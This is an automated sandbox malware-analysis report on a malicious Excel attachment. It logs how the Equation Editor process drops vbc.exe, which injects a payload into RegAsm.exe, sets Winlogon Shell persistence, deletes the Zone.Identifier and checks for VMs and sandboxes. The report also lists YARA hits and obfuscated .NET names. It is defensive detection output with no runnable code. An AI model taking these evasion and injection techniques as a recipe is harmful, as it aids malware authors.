          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Yara detected Costura Assembly LoaderShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
          Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\win33.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe, type: DROPPED
          Source: Yara matchFile source: 4.2.vbc.exe.df0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04A0367C push edi; retf 4_2_04A0367D
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003C523F push cs; iretd 5_2_003C5240
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD3D8A push dword ptr [esp+ecx-75h]; iretd 5_2_00CD3D8E
          Source: initial sampleStatic PE information: section name: .text entropy: 7.98582259438
          Source: initial sampleStatic PE information: section name: .text entropy: 7.98582259438
          Source: new[1].exe.2.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: new[1].exe.2.dr, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: win33.exe.4.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: win33.exe.4.dr, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: 4.2.vbc.exe.df0000.3.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: 4.2.vbc.exe.df0000.3.unpack, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: 4.0.vbc.exe.df0000.0.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: 4.0.vbc.exe.df0000.0.unpack, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\win33.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Users\Public\vbc.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\RegAsm.exe:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: Ref 0180066743.xlsxStream path 'EncryptedPackage' entropy: 7.99983137636 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 7692Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 1664Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 379Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2572Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2840Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 1772Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Allocates memory in foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm4
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm
          Source: RegAsm.exe, 00000005.00000002.2364980071.0000000002D0A000.00000004.00000001.sdmpBinary or memory string: Program Manager
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cmp
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm0
          Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm`/
          Source: RegAsm.exe, 00000005.00000002.2364029644.0000000001060000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm\
          Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmpBinary or memory string: Program ManagerL
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cmx
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cmtz
          Source: RegAsm.exe, 00000005.00000002.2365016404.0000000002D0E000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm8
          Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmpBinary or memory string: Program Manager48CmD
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager8
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm$
          Source: RegAsm.exe, 00000005.00000002.2364029644.0000000001060000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48CmH9
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cml>
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48CmX,
          Source: RegAsm.exe, 00000005.00000002.2365541141.0000000002FE9000.00000004.00000001.sdmpBinary or memory string: Program Manager\
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm<4
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm80
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
